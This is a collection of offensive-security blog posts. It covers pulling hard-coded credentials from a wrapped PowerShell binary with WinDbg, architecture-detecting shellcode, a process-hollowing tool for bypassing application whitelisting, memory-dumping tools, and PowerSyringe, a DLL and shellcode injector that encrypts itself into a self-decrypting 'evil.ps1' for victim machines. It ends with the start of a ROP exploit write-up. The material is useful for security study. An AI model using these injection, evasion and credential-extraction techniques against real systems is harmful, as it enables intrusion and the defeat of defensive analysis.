Extracting hard-coded credentials using managed code debugging techniques in Windbg

tl;dr version

Using some simple managed code debugging techniques, you can easily pull out hard-coded credentials from a binary claiming to protect them.

---

A friend of mine (@Obscuresec) referred me to a blog post from a software vendor claiming that if you absolutely have to hard-code credentials into a PowerShell script, that you'd at least be safer by using their product to wrap the script into a binary. If all reverse engineers were monkeys this might be true... and there are a lot of monkeys out there. To their credit, they advise their readers to never hard-code credentials into scripts. However, this monkey, when armed with a debugger will dispute (i.e. throw feces at) the vendor's claim that their product offers an additional layer of security.

Today, I'll be analyzing WMIQueryPS1.exe which can be obtained via the link above. WMIQueryPS1.exe is simply a .NET-compiled binary wrapper for a PowerShell script. The script used in this example passes domain credentials to a remote machine in order to execute a WMI query. The goal of this exercise is to pull out the credentials without decompiling the binary. Here's my step-by-step walk-though of how this was achieved.

1) Fire up the executable in WinDbg.

2) Load the CLR debugging extension for WinDbg - SOS.dll.

0:000> .load C:\Windows\Microsoft.NET\Framework\v2.0.50727\SOS.dll

SOS.dll is a WinDbg extension used to aid in debugging managed code. More details on SOS.dll can be found here.

3) Let the program run its course and see what happens.

0:000> g
...
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=032e0504 ecx=00000000 edx=00000000 esi=02f3acd0 edi=02c85d50
eip=004c2297 esp=0031eba4 ebp=0031ebd4 iopl=0         nv up ei ng nz ac pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297
004c2297 8b01            mov     eax,dword ptr [ecx]  ds:0023:00000000=????????

Lol. We have a null-pointer dereference and conveniently, a good place to stop and inspect the CLR environment.

4) First, let's see what method in managed code triggered the exception:

0:000> !IP2MD @eip
MethodDesc: 001c6200
Method Name: PoshExeHostCmd.VBSPoSH.GetValue(System.String)
Class: 003706b8
MethodTable: 001c6234
mdToken: 060000b4
Module: 001c2c5c
IsJitted: yes
CodeAddr: 004c21f8

The !IP2MD command will tell you what method a particular JITed address belongs to. In this example, an exception was thrown in the PoshExeHostCmd.VBSPoSH.GetValue method.

5) Now let's see the CLR call stack and get some context as to how we got to where we did:

0:000> !CLRStack
OS Thread Id: 0x9f4 (0)
ESP       EIP    
0031eba4 004c2297 PoshExeHostCmd.VBSPoSH.GetValue(System.String)
0031ebdc 004c1e2d PoshExeHostCmd.VBSPoSH.Execute(System.String, System.String[])
0031ec1c 004c0ba9 PoshExeHostCmd.Program.RunPowerShell(System.String[])
0031ed54 004c011c PoshExeHostCmd.Program.Main(System.String[])
0031ef88 6d2d1b4c [GCFrame: 0031ef88]

Considering this binary just wraps an obfuscated PowerShell script, it has to pass the deobfuscated script block as a parameter at some point. PoshExeHostCmd.VBSPoSH.Execute(System.String, System.String[]) looks like a good candidate method worth inspecting. Let's launch the assembly again and set a managed breakpoint on that method

6) In WinDbg, you can only set breakpoints on native code. To break on managed code, you rely upon the !bpmd command. Note: You cannot execute CLR debugger extension commands until mscorwks.dll has been loaded. Therefore, I'll set a conditional breakpoint upon the loading of a module and set a breakpoint for the managed method in a single instruction.

0:000> sxe -c "!bpmd WMIQueryPS1.exe PoshExeHostCmd.VBSPoSH.Execute; g" ld
0:000> sx
  ct - Create thread - ignore
  et - Exit thread - ignore
 cpr - Create process - ignore
 epr - Exit process - break
  ld - Load module - break
       Command: "!bpmd WMIQueryPS1.exe PoshExeHostCmd.VBSPoSH.Execute; g"
  ud - Unload module - ignore
 ser - System error - ignore
 ibp - Initial breakpoint - break
 iml - Initial module load - ignore
 out - Debuggee output - output
...

The sx command confirms that my 'conditional' breakpoint was set. Now, let the program run and it will break on the method in question.

0:000> g
JITTED PoshExeHostCmd!PoshExeHostCmd.VBSPoSH.Execute(System.String, System.String[])
Setting breakpoint: bp 016A1B98 [PoshExeHostCmd.VBSPoSH.Execute(System.String, System.String[])]
Breakpoint 0 hit
eax=013d61ac ebx=029b6a10 ecx=029b6a10 edx=0309f09c esi=00000000 edi=0309f608
eip=016a1b98 esp=002aed24 ebp=002aee5c iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000212
016a1b98 55              push    ebp

7) Here we are. Let's check out the string that was passed to the method as an argument.

0:000> !CLRStack -p
OS Thread Id: 0xfe4 (0)
ESP       EIP    
002aed24 016a1b98 PoshExeHostCmd.VBSPoSH.Execute(System.String, System.String[])
    PARAMETERS:
        this = 0x029b6a10
        command = 0x0309f09c
        args = 0x029b1f84

002aed2c 016a0ba9 PoshExeHostCmd.Program.RunPowerShell(System.String[])
    PARAMETERS:
        args = <no data>

002aee64 016a011c PoshExeHostCmd.Program.Main(System.String[])
    PARAMETERS:
        args = <no data>

002af090 6d2d1b4c [GCFrame: 002af090]

8) After poking around a bit, it turns out that the address of the 'command' object (0x0309f09c) is what we want to dump

0:000> !DumpObj -nofields 0x0309f09c
Name: System.String
MethodTable: 6ca40ae8
EEClass: 6c7fd65c
Size: 1386(0x56a) bytes
 (C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)
String: # ==============================================================================================
# 
# Microsoft PowerShell Source File -- Created with SAPIEN Technologies PrimalScript 2012
# 
# NAME: 
# 
# AUTHOR: Alex , Toshiba
# DATE  : 4/24/2012
# 
# COMMENT: 
# 
# ==============================================================================================

$pass = ConvertTo-SecureString "SUPERSTRONGPASSWORD" -asplaintext -force
$credentials = new-object -typename System.Management.Automation.PSCredential -argumentlist "SUPERADMINUSER",$pass

Get-WmiObject -Credential $credentials -query "Select * from Win32_DiskDrive" -computername "SUPERSECRETSERVER"

9) Boom! All your creds are belong to me! I've just dumped the secret credentials that this vendor is claiming to protect. Not a difficult exercise.

I could have used these techniques in conjunction with a tool like .NET Reflector to decompile the method (SimpleDecodeData) that pulls the obfuscated scriptblock from the PE file's resource section and then deobfuscate the Powershell scriptblock but that would just be redundant. That, and the vendor might not appreciate it that much.

So what's the lesson in all this? Do not ever, EVER hard-code credentials into a file! If someone wants them bad enough (me), they will get them.

Architecture Independent Windows Shellcode

What's this? A non PowerShell-related blog post??? Unheard of! Today's post is more of a novelty but perhaps someone might benefit from it.

There may be times when you’d like to execute shellcode but don’t know the architecture of the processor that you’ll be running on. I’ve seen at least two techniques to solve this problem [1] [2]. Well, here’s yet another technique that is specific to Windows. The following shellcode will detect whether it’s running in pure 32-bit, pure 64-bit, or Wow64 mode:

[BITS 64]
; gs is not used in 32-bit
; gs will be non-zero in 64-bit and wow64
mov cx, gs
test cx, cx
jz short bit32           ; executing in 32-bit mode
mov ecx, dword [gs:0x64] ; high order 32 bits of gs:[0x60]
                         ; in 64-bit will always equal 0x7ff
cmp cx, 0x07ff
je short bit64           ; executing in 64-bit mode
; otherwise, executing in wow64 mode

[BITS 32]
wow64:
; Do wow64 stuff
mov eax, [gs:0x60]       ; load PEB address
nop
nop
ret

bit32:
; Do 32-bit stuff
mov eax, [fs:0x30]       ; load PEB address
nop
nop
ret

bit64:
[BITS 64]
; Do 64-bit stuff
mov rax, [gs:0x60]       ; load PEB address
nop
nop
ret

On 64-bit processors in Windows, the GS segment register stores the pointer to the PEB (Process Environment Block) in GS:[0x60]. In Wow64 mode this is a DWORD value. In 32-bit mode, the GS segment register is not used and uses FS:[0x30] to point to the PEB.

1. Berend-Jan "SkyLined" Wever, w32-exec-calc-shellcode, http://code.google.com/p/w32-exec-calc-shellcode/

2. “isX64 Gem”, July 31, 2011, http://www.ragestorm.net/blogs/?p=376

64-bit Process Replacement in Powershell

Download here: Replace-x64-Process.ps1

For those of you who follow me on Twitter, you may have noticed that I posted a few teasers related to replacing processes in Powershell. Without further ado, I am releasing Replace-x64-Process. This tool is intended solely as a proof-of-concept tool. I say that because I make absolutely no guarantees that it will work in all cases. In fact, it won't work in many cases.

The intent of this tool is to circumvent application whitelisting products. Assuming Powershell is whitelisted, you can use this tool to load a blacklisted executable within a whitelisted process. I have not tested this tool on any whitelisting products, however so I cannot attest to its level of effectiveness.

Replace-x64-Process makes use of some common techniques seen in malware to replace a suspended process' executable image. Fortunately, Powershell gives us access to many of the mechanisms required to achieve this goal.

Basic steps required to replace a process in memory:

1) Load the host process in a suspended state.
2) Open a handle to the main thread of the executable
3) Get the context of the suspended thread. In 64-bit the entry point to the process is located in RCX. A pointer to the PEB (Process Environment Block) is located in RDX.
4) Call ZwUnmapViewOfSection to unmap the image of the host process
5) Parse the section headers of the target process
6) Find the image base of the target process
7) Allocate space to contain the image of the target process
8) Map the PE header and each section of the executable to the newly allocated memory.
9) Update the PEB to reflect the new image base address
10) Call SetThreadContext to redirect execution to the target process
11) Resume the process

Here is an example of the script in action:

Replacing Internet Explorer with cmd.exe

Replacing notepad.exe with a 64-bit bind shell

In the last example, it is worth noting that the Microsoft code signature is not invalidated after loading the malicious process. This is due to the fact that code signatures are validated  prior to the main thread loading. This is an unintended but awesome side effect of this process.

Lastly, I have a 32-bit version of this script. It is however even more flaky than the 64-bit version. I suspect it's due to the fact that I don't account for relocations. Because instructions in 64-bit are RIP-relative, relocations are no longer necessary. I may release a more polished script for both 32 and 64-bit in the future once I become more familiar with the loading process.

Replace-x64-Process Help File

NAME
    Replace-x64-Process

SYNOPSIS
    Replaces an arbitrary process with another process.
    Author: Matthew Graeber (@mattifestation)
    License: GNU GPL v2

SYNTAX
    Replace-x64-Process [-HostProcess] <String> [-With] <String> [[-Arguments] <String>] [<CommonParameters>]


DESCRIPTION

    The Replace-x64-Process function loads a 64-bit executable of your choosing into a suspended state
    and replaces it with the target of your choosing. This function is intended to bypass application
    whitelisting products.

    Usage notes:
    - It is assumed that executing Powershell is allowed.
    - It is assumed that csc.exe (C-Sharp compiler) is allowed. A future release may obviate the need for
      csc.exe through the usage of the .NET Reflection class.
    - This does not work reliably in every case, most likely due to my lack of complete understanding of
      the loading process. I.E. Don't whine if it doesn't work unless you come bearing a potential solution.


PARAMETERS
    -HostProcess <String>
        Specifies the host process to load suspended and replace.

        Required?                    true
        Position?                    1
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -With <String>
        Specifies the target process that will replace the host process.

        Required?                    true
        Position?                    2
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -Arguments <String>
        Specifies any optional parameters to pass to the target process

        Required?                    false
        Position?                    3
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    <CommonParameters>
        This cmdlet supports the common parameters: Verbose, Debug,
        ErrorAction, ErrorVariable, WarningAction, WarningVariable,
        OutBuffer and OutVariable. For more information, type,
        "get-help about_commonparameters".

NOTES

        echo 'Unconstructive complaints' > $null

        Please don't ask for help on how to execute a Powershell script such as this one. That's what the
        Interwebs are for.

    -------------------------- EXAMPLE 1 --------------------------

    PS>Replace-x64-Process 'C:\Program Files\Internet Explorer\iexplore.exe' -With 'C:\Windows\System32\cmd.exe'


    Description
    -----------
    Loads Internet Explorer and replaces its executable image with that of cmd.exe.



    -------------------------- EXAMPLE 2 --------------------------

    PS>Replace-x64-Process 'C:\Windows\System32\notepad.exe' -With 'C:\Windows\System32\cmd.exe' -Arguments '/c ping 127.0.0.1 -n 3 > C:\results.txt'


    Description
    -----------
    Loads notepad.exe and replaces its image with cmd.exe and executes ping as an argument.

Enjoy and try not to get too frustrated when the tool doesn't work for you. Also, if you use the -verbose option, you'll find that much of the code in this script demonstrates the beginnings of a full-fledged PE parser. Perhaps more on that in a future posting... If you have any suggestions on how to increase the reliability of this tool, please leave a comment.

Powershell Live-Memory Analysis Tools: Dump-Memory, Dump-Strings, Check-MemoryProtection

 I’m releasing three new tools for Powershell that may be of use for those performing live-memory forensics or for penetration testers trying to pull sensitive information from memory. Dump-Memory will simply dump the contents of memory to stdout or to a raw binary file on disk. Dump-Strings is like Sysinternals Strings but it operates on memory. It will dump the strings of any readable portion of memory in both Ascii and Unicode format. Lastly, Check-MemoryProtection is more of a helper function that will return the memory page protections of any address. All of these scripts operate entirely within memory unless you explicitly choose to write to disk.

Note: For Dump-Memory and Dump-Strings to work, the Check-MemoryProtection function must be defined. It is used to ensure that an access violation doesn’t occur if you try to access an inaccessible portion of memory.

Download here: Memory-Tools.ps1

I’m always open to feature requests. Just leave a comment if there is a feature you want implemented and I will try to make that happen. For example, one feature I might consider adding is a ‘-Force’ switch that would forcibly change the protections on the requested range of memory. Currently, these tools use only the minimum level of privilege needed to query the memory of a remote process.

Here are the help files for each tool:

Dump-Memory

NAME
    Dump-Memory

SYNOPSIS
    Dumps memory contents to stdout or to disk.

    Author: Matthew Graeber (@mattifestation)
    License: GNU GPL v2

SYNTAX
    Dump-Memory [-Address] <IntPtr> [-Offset] <Int32> [-ProcessId <Int32>] [-Width <Int32>] [-DumpToFile <String>] [<CommonParameters>]

DESCRIPTION
    The Dump-Memory cmdlet displays the contents of memory to stdout. You also have the option to dump raw memory to disk.

PARAMETERS
    -Address <IntPtr>
        Specifies the base address of memory that is to be dumped.

        Required?                    true
        Position?                    1
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -Offset <Int32>
        Specifies the number of bytes to dump.

        Required?                    true
        Position?                    2
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -ProcessId <Int32>
        Dumps the memory of the process whose ID was specified.

        Required?                    false
        Position?                    named
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -Width <Int32>
        Specifies how many bytes to print per line when outputting to stdout

        Required?                    false
        Position?                    named
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -DumpToFile <String>
        Specifies the path to the output file.

        When this option is specified, memory will not be displayed on stdout.

        This parameter can be in the for of an absolute or relative file path.

        Required?                    false
        Position?                    named
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    <CommonParameters>
        This cmdlet supports the common parameters: Verbose, Debug,
        ErrorAction, ErrorVariable, WarningAction, WarningVariable,
        OutBuffer and OutVariable. For more information, type,
        "get-help about_commonparameters".

    -------------------------- EXAMPLE 1 --------------------------

    C:\PS>$proc = ps cmd
    C:\PS>$module = $proc.MainModule
    C:\PS>$base = $module.BaseAddress
    C:\PS>Dump-Memory $base 0x98 -ProcessId $proc.Id

    00000000h  4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00  MZ..........ÿÿ..
    00000010h  B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ,.......@.......
    00000020h  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00000030h  00 00 00 00 00 00 00 00 00 00 00 00 F0 00 00 00  ............d...
    00000040h  0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68  ..º..'.I!,.LI!Th
    00000050h  69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F  is.program.canno
    00000060h  74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20  t.be.run.in.DOS.
    00000070h  6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00  mode....$.......
    00000080h  4D 7C A4 8A 09 1D CA D9 09 1D CA D9 09 1D CA D9  M|☼...EU..EU..EU
    00000090h  00 65 4E D9 08 1D CA D9                          .eNU..EU

    Description
    -----------
    This command dumps the first 0x98 bytes of the main module of cmd.exe to stdout.


    -------------------------- EXAMPLE 2 --------------------------

    C:\PS>$proc = [System.Diagnostics.Process]::GetCurrentProcess()
    C:\PS>$module = $proc.MainModule
    C:\PS>$base = $module.BaseAddress
    C:\PS>Dump-Memory $base 0x120

    00000000h  4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00  MZ..........ÿÿ..
    00000010h  B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ,.......@.......
    00000020h  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00000030h  00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00  ................
    00000040h  0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68  ..º..'.I!,.LI!Th
    00000050h  69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F  is.program.canno
    00000060h  74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20  t.be.run.in.DOS.
    00000070h  6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00  mode....$.......
    00000080h  FF 54 CD 72 BB 35 A3 21 BB 35 A3 21 BB 35 A3 21  ÿTIr»5£!»5£!»5£!
    00000090h  9C F3 D8 21 B9 35 A3 21 B2 4D 36 21 BA 35 A3 21  .óO!.5£!.M6!º5£!
    000000A0h  B2 4D 27 21 AB 35 A3 21 B2 4D 30 21 AA 35 A3 21  .M'!«5£!.M0!ª5£!
    000000B0h  BB 35 A2 21 20 35 A3 21 B2 4D 20 21 FF 35 A3 21  »5¢!.5£!.M.!ÿ5£!
    000000C0h  B2 4D 29 21 BD 35 A3 21 9C F3 DD 21 BA 35 A3 21  .M)!.5£!.óY!º5£!
    000000D0h  B2 4D 37 21 BA 35 A3 21 B2 4D 32 21 BA 35 A3 21  .M7!º5£!.M2!º5£!
    000000E0h  52 69 63 68 BB 35 A3 21 00 00 00 00 00 00 00 00  Rich»5£!........
    000000F0h  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00000100h  50 45 00 00 64 86 05 00 F3 C7 5B 4A 00 00 00 00  PE..d...óÇ[J....
    00000110h  00 00 00 00 F0 00 22 00 0B 02 09 00 00 DC 00 00  ....d."......Ü..

    Description
    -----------
    This command dumps the first 0x120 bytes of the main module of the currently loaded process (powershell.exe) to stdout.


    -------------------------- EXAMPLE 3 --------------------------

    C:\PS>$proc = [System.Diagnostics.Process]::GetCurrentProcess()
    C:\PS>$module = $proc.MainModule
    C:\PS>$size = $module.ModuleMemorySize
    C:\PS>$base = $module.BaseAddress
    C:\PS>Dump-Memory $base $size -DumpToFile .\out.exe

    Description
    -----------
    This command dumps the entire memory image of powershell.exe to disk in binary format.

    Note: Execution of the dumped memory image requires fixing up the PE header.

Dump-Strings

NAME
    Dump-Strings

SYNOPSIS
    Retrieves strings from memory.

    Author: Matthew Graeber (@mattifestation)
    License: GNU GPL v2

SYNTAX
    Dump-Strings [-Address] <IntPtr> [-Offset] <Int32> [-ProcessId <Int32>] [-Encoding <String>] [-MinimumLength <Int32>] [-StringOffset] [<CommonParameters>]

DESCRIPTION
    The Dump-Strings cmdlet retrieves strings from the memory of any process.

    Dump-Strings will print both ASCII and Unicode strings to stdout. Its functionality is similar to Sysinternals strings.exe but it operates in memory.

PARAMETERS
    -Address <IntPtr>
        Specifies the memory base address.

        Required?                    true
        Position?                    1
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -Offset <Int32>
        Specifies the number of bytes to process.

        Required?                    true
        Position?                    2
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -ProcessId <Int32>
        Dumps the strings of the process whose ID was specified. Not specifying a process ID will result in querying the address space of powershell.exe.

        Required?                    false
        Position?                    named
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -Encoding <String>
        Specifies the string encoding to use. The default option is 'DEFAULT' which will return both ASCII and Unicode. The other options are 'ASCII' and 'UNIC
        ODE'

        Required?                    false
        Position?                    named
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -MinimumLength <Int32>
        Specifies the minimum length string to return. The default length is 3.

        Required?                    false
        Position?                    named
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -StringOffset [<SwitchParameter>]
        Specifies the offset in memory where the string occurs.

        Required?                    false
        Position?                    named
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    <CommonParameters>
        This cmdlet supports the common parameters: Verbose, Debug,
        ErrorAction, ErrorVariable, WarningAction, WarningVariable,
        OutBuffer and OutVariable. For more information, type,
        "get-help about_commonparameters".


    -------------------------- EXAMPLE 1 --------------------------

    C:\PS>$proc = Get-Process cmd
    C:\PS>$module = $proc.MainModule
    C:\PS>$size = $module.ModuleMemorySize
    C:\PS>$base = $module.BaseAddress
    C:\PS>Dump-Strings $base $size -MinimumLength 20 -ProcessId $proc.Id

    !This program cannot be run in DOS mode.
    api-ms-win-core-processthreads-l1-1-0.DLL
    SetConsoleInputExeNameW
    APerformUnaryOperation: '%c'
    APerformArithmeticOperation: '%c'
    NtQueryInformationProcess
    SaferComputeTokenFromLevel
    ImpersonateLoggedOnUser
    SaferRecordEventLogEntry
    CreateProcessAsUserW
    GetSecurityDescriptorOwner
    WNetCancelConnection2W
    __C_specific_handler
    RtlLookupFunctionEntry
    ...

    Description
    -----------
    This command prints all Ascii and Unicode strings of length > 19 in the memory space of the main module of cmd.exe.


    -------------------------- EXAMPLE 2 --------------------------

    C:\PS>$proc = [System.Diagnostics.Process]::GetCurrentProcess()
    C:\PS>$module = $proc.Modules | ? { $_.ModuleName -eq 'ntdll.dll' }
    C:\PS>$size = $module.ModuleMemorySize
    C:\PS>$base = $module.BaseAddress
    C:\PS>Dump-Strings $base $size -StringOffset -Encoding 'UNICODE'

    57416:LdrResFallbackLangList Enter
    57448:LdrResFallbackLangList Exit
    136960:KnownDllPath
    136976:\KnownDlls
    136992:\SystemRoot
    137008:\System32\
    183672:\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
    183736::%u.%u.%u.%u
    183856:%u.%u.%u.%u
    183872::%u
    184048:RtlpResUltimateFallbackInfo Enter
    184088:svchost.exe
    184104:\Registry\Machine\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
    184184:GlobalSession
    184200:\Registry\Machine\Software\Microsoft\SQMClient\Windows\DisabledSessions\

    Description
    -----------
    This command prints all Unicode strings of length > 2 in the loaded module - ntdll.dll within the memory space of powershell.exe.

Check-MemoryProtection

NAME
    Check-MemoryProtection

SYNOPSIS
    Retrieves the memory protections of an arbitrary address.

    Author: Matthew Graeber (@mattifestation)
    License: GNU GPL v2

SYNTAX
    Check-MemoryProtection [-Address] <IntPtr> [[-ProcessId] <Int32>] [[-PageSize] <Int32>] [<CommonParameters>]

DESCRIPTION
    The Check-MemoryProtection cmdlet returns the memory protections of any memory address.

    Check-MemoryProtection is just a wrapper for the Windows API VirtualQuery function that outputs protections in a human-readable format.

PARAMETERS
    -Address <IntPtr>
        Specifies the address whose memory protections are to be queried.

        Required?                    true
        Position?                    1
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -ProcessId <Int32>
        Queries the memory of the provided process ID.

        Required?                    false
        Position?                    2
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -PageSize <Int32>
        Specifies the memory page size. This can safely be left to its default of 0x1000 bytes.

        Required?                    false
        Position?                    3
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    <CommonParameters>
        This cmdlet supports the common parameters: Verbose, Debug,
        ErrorAction, ErrorVariable, WarningAction, WarningVariable,
        OutBuffer and OutVariable. For more information, type,
        "get-help about_commonparameters".

OUTPUTS
    Winapi.Kernel32+MEMORY_BASIC_INFORMATION
        By default, Check-MemoryProtection returns a MEMORY_BASIC_INFORMATION structure.


    -------------------------- EXAMPLE 1 --------------------------

    C:\PS>$proc = [System.Diagnostics.Process]::GetCurrentProcess()
    C:\PS>$module = $proc.MainModule
    C:\PS>$base = $module.BaseAddress
    C:\PS>Check-MemoryProtection $base

    BaseAddress       : 5363597312
    AllocationBase    : 5363597312
    AllocationProtect : PAGE_EXECUTE_WRITECOPY
    RegionSize        : 4096
    State             : MEM_COMMIT
    Protect           : PAGE_READONLY
    Type              : MEM_IMAGE

    Description
    -----------
    This command returns the memory protections of the currently loaded process' base address. In this example, the memory address queried is the base addr
    of powershell.exe


    -------------------------- EXAMPLE 2 --------------------------

    C:\PS>$proc = ps cmd
    C:\PS>$base = $proc.MainModule.BaseAddress
    C:\PS>Check-MemoryProtection $base $proc.Id

    BaseAddress       : 1246035968
    AllocationBase    : 1246035968
    AllocationProtect : PAGE_EXECUTE_WRITECOPY
    RegionSize        : 4096
    State             : MEM_COMMIT
    Protect           : PAGE_READONLY
    Type              : MEM_IMAGE

    Description
    -----------
    This command returns the memory protections of cmd.exe.


    -------------------------- EXAMPLE 3 --------------------------

    C:\PS>Check-MemoryProtection 0x00000000

    BaseAddress       : 0
    AllocationBase    : 0
    AllocationProtect : 0
    RegionSize        : 65536
    State             : MEM_FREE
    Protect           : PAGE_NOACCESS
    Type              : 0


    Description
    -----------
    This command returns the memory protections of the null page.

PowerSyringe - PowerShell-based Code/DLL Injection Utility

Download Link: PowerSyringe.ps1

So I decided to expand upon my previous post and create a slightly more full-featured Powershell-based code/DLL injection utility. Behold, PowerSyringe. As the name implies, I based some of the code on the original Syringe toolkit. I added several features though - specifically, 64-bit support and encryption. Here is a rundown of its features:

• Shellcode injection from within Powershell
• Shellcode injection into any 32 or 64-bit process
• DLL injection into any 32 or 64-bit process
• Encryption - The script can encrypt itself and outputs the encrypted version to .\evil.ps1. This will make analysis of the script impossible/improbable without the correct password and salt (or if they happen to perform live memory forensics). >D
• Decryption - evil.ps1 will decrypt itself back into its original form if you provide the right password and salt
• Doesn't flag DEP b/c it doesn't execute in the stack
• Fairly detailed documentation

I’ve tested the tool on several 32 and 64-bit platforms but I would love to get some feedback/feature requests. To execute the script, ensure that your execution policy allows you to execute scripts. If not, no worries. You can simply copy and paste the all of the code into a PowerShell prompt. Then you can run ‘help PowerSyringe -full’ for detailed documentation. There are several other methods for bypassing the execution policy. One of those methods is detailed here.

Here is an excerpt of the documentation with usage examples:

DLL Injection
C:\PS>PowerSyringe 1 4274 .\evil.dll

Description
Inject 'evil.dll' into process ID 4274.


Inject shellcode into process
C:\PS>PowerSyringe 2 4274

Description
Inject the shellcode as defined in the script into process ID 4274


Execute shellcode within the context of PowerShell
C:\PS>PowerSyringe 3

Description
Execute the shellcode as defined in the script within the context of Powershell.


Encrypt the script with the password:'password' and salt:'salty'
C:\PS>PowerSyringe 4 .\PowerSyringe.ps1 password salty

Description

Encrypt the contents of this file with a password and salt. This will make analysis of the script impossible without the correct password and salt combination. This command will generate evil.ps1 that can dropped onto the victim machine. It only consists of a decryption function 'de' and the base64-encoded ciphertext.

Note: This command can be used to encrypt any text-based file/script


Decrypt encrypted script and execute it in memory
C:\PS>[String] $cmd = Get-Content .\evil.ps1
C:\PS>Invoke-Expression $cmd
C:\PS>$decrypted = de password salt
C:\PS>Invoke-Expression $decrypted

Description

After you run the encryption option and generate evil.ps1 these commands will decrypt and execute

(i.e. define the function) PowerSyringe entirely in memory assuming you provided the proper password and salt combination.

Upon successful completion of these commands, you can execute PowerSyringe as normal.

Note: "Invoke-Expression $decrypted" may generate an error. Just ignore it. PowerSyringe will

still work.

This is what evil.ps1 will look like after the encryption function is called:

function de([String] $b, [String] $c)
{
# $a (encrypted PowerSyringe.ps1) truncated for sanity
$a = "M4g3yq9lTiMC+GTN2qNCRuUg1TFM8bgSvlxl/ENmXWpEIIgrdMq31/Jl025jClm9CcVZz7VIA40TV..."
$encoding = New-Object System.Text.ASCIIEncoding;
$dd = $encoding.GetBytes("CRACKMEIFYOUCAN!");
$aa = [Convert]::FromBase64String($a);
$derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($b, $encoding.GetBytes($c), "SHA1", 2);
[Byte[]] $e = $derivedPass.GetBytes(32);
$f = New-Object System.Security.Cryptography.RijndaelManaged;
$f.Mode = [System.Security.Cryptography.CipherMode]::CBC;
[Byte[]] $h = New-Object Byte[]($aa.Length);
$g = $f.CreateDecryptor($e, $dd);
$i = New-Object System.IO.MemoryStream($aa, $True);
$j = New-Object System.Security.Cryptography.CryptoStream($i, $g, [System.Security.Cryptography.CryptoStreamMode]::Read);
$r = $j.Read($h, 0, $h.Length);
$i.Close();
$j.Close();
$f.Clear();
return $encoding.GetString($h,0,$h.Length);
}

As you can see, the decryption script is slightly 'obfuscated' if you even want to call it that. It's pretty obvious that it decrypts the $a variable. Unfortunately, anyone performing analysis on this evil script will have no idea what the contents of $a are without the correct password and salt.

The primary reason I wrote this was because I had been using Syringe on assessments to bypass host-based IPS systems but I didn't like some of the limitations of Syringe (specifically, no 64-bit support) and I like the idea of performing everything in memory without needing to drop any executables. That being said, I welcome your constructive feedback.

Enjoy!

Man vs. ROP - Overcoming Adversity One Gadget at a Time

Introduction

I recently discovered a rather simple stack-based buffer overflow in a legacy application that shall remain unnamed. With DEP disabled, exploiting the vulnerability was trivial. It’s no longer 1999, however. If you want to write any exploit these days you have to at least be proficient in return-oriented programming techniques to bypass data execution prevention. This article will detail some of the nonorthodox techniques that were required to get code execution for this particular vulnerability.

Prerequisites

Before reading this, you should be rather comfortable with return-oriented programming techniques. I highly recommend checking out the following presentations/articles before diving in to the techniques I’ll describe:

Stephen Sims - "SANS Security 660 Series: Return-Oriented Programming and Exploitation"

Dino Dai Zovi (@dinodaizovi) - "Practical Return-Oriented Programming"

Peter Van Eeckhoutte (@corelanc0d3r) - "Exploit writing tutorial part 10 : Chaining DEP with ROP – the Rubik’s[TM] Cube"

Also, if you enjoy Peter’s article, please be sure to donate to his fight against plagiarism in the infosec community.

Vulnerability Synopsis

The application was vulnerable to a simple stack buffer overflow when it read in a particular value from a config file. An excessively long value overwrote the stack cookie, saved frame pointer, return address, SE handler, and a virtual function pointer on the stack. Because the app was compiled with the /GS flag, overwriting the saved EIP wasn't going to cut it since the stack cookie would have been validated and the process terminate upon detecting the clobbered cookie value. No problem. Fortunately, the SE handler was overwritten and the app crashed upon calling the virtual function pointer - both valid avenues to exploitation. It seemed all too simple until I started trying to find valid ROP gadgets. This is where the fun/frustration began.

Here are some additional details worth noting:

• All but three modules (the executable and two DLLs) were compiled with ASLR. However, only one of the DLLs could be used for building a ROP chain since the other DLL contained a bad character, thus truly limiting the amount of potential ROP gadgets.
• The following were bad characters: '\x00\x0a\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x28\x29\x2a'
